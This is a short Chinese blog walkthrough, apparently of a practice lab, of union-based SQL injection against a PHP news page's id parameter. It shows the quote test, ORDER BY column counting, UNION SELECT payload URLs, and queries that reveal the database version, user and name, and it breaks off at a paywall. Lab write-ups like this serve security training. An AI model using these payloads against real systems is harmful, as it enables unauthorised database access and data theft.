主界面URL没有参数,无法判断是否有注入点
点击公告
【浏览器不便于查看返回包可以用burp】
测试URL
参数后加上单引号,报错,说明存在注入点
http://124.70.64.48:40021/new_list.php?id=1'获取表列数
order by 4 返回200
order by 5 返回500
id 所在表有4列爆显位
让id=-1,使前半段查询出错,让后半段查询结果显示出来
填充数字个数等于列刚才得到的列数
http://124.70.64.48:40021/new_list.php?id=-1%20union%20select%201,2,3,4获取信息
在显位上查询以下信息:
version() 数据库版本5.7.22-0ubuntu0.16.04.1
user() 用户root@localhost
@@version_compile_os 操作系统Linux
database() 数据库名字mozhe_Discuz_StormGroup知道数据库名字,到information_schema里查数据库中的表
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
